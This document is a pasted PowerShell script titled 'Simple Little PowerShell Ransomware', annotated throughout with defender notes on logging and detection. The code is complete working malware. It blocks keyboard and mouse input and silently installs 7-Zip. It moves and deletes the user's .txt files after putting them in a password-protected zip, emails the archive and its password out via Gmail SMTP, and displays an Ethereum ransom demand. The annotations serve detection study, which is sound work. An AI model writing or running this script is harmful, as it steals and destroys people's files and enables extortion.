FlyFar

Simple Little PowerShell "Ransomware"

Oct 24th, 2021
  1. #Temporarily disable user mouse and keyboard input
  # Defender note: the here-string below is C# source for a P/Invoke declaration of
  # user32!BlockInput; Add-Type compiles it at runtime and -PassThru returns the new type.
  # A DllImport definition handed to Add-Type appears in PowerShell script block logging
  # (event ID 4104), and on Windows PowerShell the compile step typically shows up as a
  # csc.exe child process - TODO confirm on the PowerShell version in use.
  2. $code = @"
  3.    [DllImport("user32.dll")]
  4.    public static extern bool BlockInput(bool fBlockIt);
  5. "@
  6.  
  7. $userInput = Add-Type -MemberDefinition $code -Name UserInput -Namespace UserInput -PassThru
  # Input stays blocked from here until BlockInput($false) is called near the end of the
  # script. Per the Win32 documentation the system also unblocks input when the blocking
  # thread exits, so terminating the hosting PowerShell process returns control to the user.
  8. $userInput::BlockInput($true)
  9.  
  10. #Install 7zip to zip files
  # Defender note: this section stages and quietly installs a third-party archiver so the
  # script has a tool for building a password-protected archive. Indicators visible here:
  # a new c:\installer\ directory, a PowerShell-initiated download of an .msi, and
  # msiexec.exe launched from PowerShell with a reduced UI (/qb).
  11. $workdir = "c:\installer\"
  12.  
  13. If (Test-Path -Path $workdir -PathType Container)
  14. { Write-Host "$workdir already exists" -ForegroundColor Red}
  15. ELSE
  16. { New-Item -Path $workdir  -ItemType directory }
  17.  
  18. #Download the installer
  # The URL is plain http:// and nothing below checks a hash or signature before the
  # package is installed, so the transfer is readable (and alterable) on the network path.
  # The file name suggests 7-Zip 16.04; an unexpected archiver install in software
  # inventory or MsiInstaller log entries is worth correlating with this activity.
  19. $source = "http://www.7-zip.org/a/7z1604-x64.msi"
  20. $destination = "$workdir\7-Zip.msi"
  21.  
  22.  
  # Uses Invoke-WebRequest when the cmdlet exists, otherwise falls back to
  # System.Net.WebClient.DownloadFile; both write to the same destination path.
  23. if (Get-Command 'Invoke-Webrequest')
  24. {
  25.      Invoke-WebRequest $source -OutFile $destination
  26. }
  27. else
  28. {
  29.     $WebClient = New-Object System.Net.WebClient
  30.     $webclient.DownloadFile($source, $destination)
  31. }
  32.  
  # This call repeats the download unconditionally, so two requests for the same URL
  # may appear in proxy or DNS logs for a single execution.
  33. Invoke-WebRequest $source -OutFile $destination
  34.  
  35. #Start the installation
  36. msiexec.exe /i "$workdir\7-Zip.msi" /qb
  37.  
  38. #Wait a few Seconds for the installation to finish
  39. Start-Sleep -s 10
  40.  
  41. #Remove the installer
  # Only files matching 7* are removed. The c:\installer\ directory and the installed
  # 7-Zip program are left behind and can serve as host artifacts during triage.
  42. rm -Force $workdir\7*
  43.  
  44. #Set source and destination of files to copy and store (ideally you would use something other than desktop)
  # "(username)" is a literal placeholder in the paste, not a resolved profile path.
  45. $Source = "C:\Users\(username)\Desktop\StealableFiles"
  46. $Destination = "C:\Users\(username)\Desktop\StolenFiles"
  47.  
  48. #Copy all files with certain extension and delete them in the source location
  # robocopy /mov copies and then deletes the source files; /s includes subdirectories.
  # Only *.txt is selected. Nothing in this script encrypts data in place: the impact
  # comes from moving, archiving and deleting the files.
  49. $cp = robocopy /mov $Source $Destination *.txt /s
  50.  
  51. #Generate a random 8 character password
  # GeneratePassword(8,2): length 8 with at least 2 non-alphanumeric characters.
  52. [Reflection.Assembly]::LoadWithPartialName("System.Web")
  53. $randomPassword = [System.Web.Security.Membership]::GeneratePassword(8,2)
  54.  
  55. #Set source for 7zip exe (usually the same path in most basic computers)
  56. $pathTo64Bit7Zip = "C:\Program Files\7-Zip\7z.exe"
  57.  
  58. #Zip destination folder with the random password previously generated
  # Defender note: the password is handed to 7z.exe on the command line (-p...), so
  # process-creation telemetry that records command lines (Security event 4688 with
  # command-line auditing enabled, or Sysmon event ID 1) captures it. Responders should
  # look for 7z.exe started by PowerShell with "a -tzip" and a -p switch.
  59. $arguments = "a -tzip ""$Destination"" ""$Destination"" -mx9 -p$randomPassword"
  60. $windowStyle = "Normal"
  61. $p = Start-Process $pathTo64Bit7Zip -ArgumentList $arguments -Wait -PassThru -WindowStyle $windowStyle
  62.  
  63. #Delete the destination folder
  # After this the moved files exist locally only inside the password-protected archive.
  64. $del = Remove-Item $Destination -Force -Recurse
  65.  
  # Placeholder in the paste; the same address is used as both sender and recipient below.
  66. $email = "(enter email address you want files sent to)"
  67.  
  68. #Send password for files to your e-mail
  # Defender note: the script speaks SMTP directly from the endpoint to smtp.gmail.com
  # through System.Net.Mail. A workstation PowerShell process opening SMTP sessions to a
  # public mail provider is anomalous; blocking direct outbound SMTP from endpoints and
  # alerting on attempts removes this channel. The archive password is the message body.
  69. $SMTPServer = "smtp.gmail.com"
  70. $Mailer = new-object Net.Mail.SMTPclient($SMTPServer)
  71. $From = $email
  72. $To = $email
  73. $Subject = "$Destination Password $(get-date -f yyyy-MM-dd)"
  74. $Body =  $randomPassword
  75. $Msg = new-object Net.Mail.MailMessage($From,$To,$Subject,$Body)
  76. $Msg.IsBodyHTML = $False
  77. $Mailer.send($Msg)
  78. $Msg.Dispose()
  79. $Mailer.Dispose()
  80.  
  81. #Send zip folder to your e-mail
  # Second message carries the archive as an attachment. Both subject lines embed the
  # staging path plus a yyyy-MM-dd date ("... Password ..." / "... Content ..."), which
  # gives mail gateways and DLP rules a stable pattern to match.
  82. $ZipFolder = "C:\Users\(username)\Desktop\StolenFiles.zip"
  83. $SMTPServer = "smtp.gmail.com"
  84. $Mailer = new-object Net.Mail.SMTPclient($SMTPServer)
  85. $From = $email
  86. $To = $email
  87. $Subject = "$Destination Content $(get-date -f yyyy-MM-dd)"
  88. $Body = "Zip Attached"
  89. $Msg = new-object Net.Mail.MailMessage($From,$To,$Subject,$Body)
  90. $Msg.IsBodyHTML = $False
  91. $Attachment = new-object Net.Mail.Attachment($ZipFolder)
  92. $Msg.attachments.add($Attachment)
  93. $Mailer.send($Msg)
  94. $Attachment.Dispose()
  95. $Msg.Dispose()
  96. $Mailer.Dispose()
  97.  
  98. #Delete the zip file created
  # Removes the local archive, which at this point is the only local copy of the
  # files that were moved out of the source folder.
  99. $del = Remove-Item $ZipFolder -Force -Recurse
  100.  
  101. #Disable temporary user keyboard and mouse input block
  # Re-enables keyboard and mouse input through the BlockInput wrapper type held in $userInput.
  102. $userInput::BlockInput($false)
  103.  
  104. #Display a message demanding money
  # Defender note: the text below names no wallet or contact channel, so the script itself
  # offers no recovery path; restoring the affected files depends on backups. The literal
  # string (including the misspelling "Etherum") is usable as a content signature in
  # script block logs or file scans.
  105. #Add the required .NET assembly for message display
  106. Add-Type -AssemblyName System.Windows.Forms
  107.  
  108. #Show the message
  109. $result = [System.Windows.Forms.MessageBox]::Show('We have some of your important files!!! We demand 2500 Etherum for their return! be careful next time when surfing Internet!', '!-Notice-!', 'Ok', 'Warning')